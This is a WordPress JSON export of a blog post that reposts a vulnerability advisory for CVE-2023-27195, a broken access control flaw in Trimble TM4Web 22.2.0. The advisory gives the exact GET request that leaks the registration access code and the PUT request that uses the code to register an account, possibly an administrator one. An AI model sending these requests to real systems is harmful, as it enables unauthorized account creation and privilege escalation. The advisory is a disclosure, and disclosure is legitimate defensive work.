{"id":56213,"date":"2024-04-11T19:20:00","date_gmt":"2024-04-11T15:20:00","guid":{"rendered":"https:\/\/packetstormsecurity.com\/files\/178023\/trimbletm4web2220-escalate.txt"},"modified":"2024-04-11T19:20:00","modified_gmt":"2024-04-11T15:20:00","slug":"trimble-tm4web-22-2-0-privilege-escalation-access-code-disclosure","status":"publish","type":"post","link":"https:\/\/afaghhosting.net\/blog\/trimble-tm4web-22-2-0-privilege-escalation-access-code-disclosure\/","title":{"rendered":"Trimble TM4Web 22.2.0 Privilege Escalation \/ Access Code Disclosure"},"content":{"rendered":"

CVE ID: CVE-2023-27195<\/p>\n

Description:
An access control issue in Trimble TM4Web v22.2.0 allows
unauthenticated attackers to access a specific crafted URL path to
retrieve the last registration access code and use this access code to
register a valid account. If the access code was used to create an
Administrator account, attackers are also able to register new
Administrator accounts with full rights and privileges.<\/p>\n

Vulnerability Type: Broken Access Control<\/p>\n

Vendor of Product: Trimble – Transportation
(https:\/\/transportation.trimble.com\/products\/TM4Web)<\/p>\n

Affected Product Code Base: TM4Web v22.2.0<\/p>\n

Affected Component: User registration process<\/p>\n

Attack Type: Remote<\/p>\n

Impact: Privilege escalation \/ authentication bypass<\/p>\n

Attack Vectors:*1. Accessing the last access code *<\/p>\n

GET \/inc\/tm_ajax.msw?func=UserfromUUID&uuid=<\/p>\n

Host: example.host.com<\/p>\n

*2. Sending PUT request to create a new user account with previously
retrieved access code*<\/p>\n

PUT \/inc\/tm_ajax.msw<\/p>\n

Host: example.host.com […]WEB_UUID=&USERNAME=ccruchet&FIRST_NAME=test&LAST_NAME=test&COMPANY=test&DEPARTMENT=test&ADDRESS1=test&ADDRESS2=test&CITY=test&STATE_CODE=BC&COUNTRY_CODE=CA&POSTAL_CODE=J3L0B8&PHONE=1111111111&PHONE_EXT=&FAX=&EMAIL=test@gmail.com&LANGUAGE=EN&ACCESS_CODE=XXXXXX&pwd1=Password123&pwd2=Password123&isReadonly=false&func=WebUser<\/p>\n

Discoverer: Cl\u00e9ment Cruchet (lutzenfried)<\/p>\n

References:
– Official website: https:\/\/transportation.trimble.com\/products\/TM4Web<\/p>\n","protected":false},"excerpt":{"rendered":"

CVE ID: CVE-2023-27195 Description:An access control issue in Trimble TM4Web v22.2.0 allowsunauthenticated attackers to access a specific crafted URL path toretrieve the last registration access code and use this access code toregister a valid account. If the access code was used to create anAdministrator account, attackers are also able to register newAdministrator accounts with full …<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"closed","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[26],"tags":[],"class_list":["post-56213","post","type-post","status-publish","format-standard","hentry","category-vulnerability"],"_links":{"self":[{"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/posts\/56213","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/comments?post=56213"}],"version-history":[{"count":0,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/posts\/56213\/revisions"}],"wp:attachment":[{"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/media?parent=56213"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/categories?post=56213"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/tags?post=56213"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}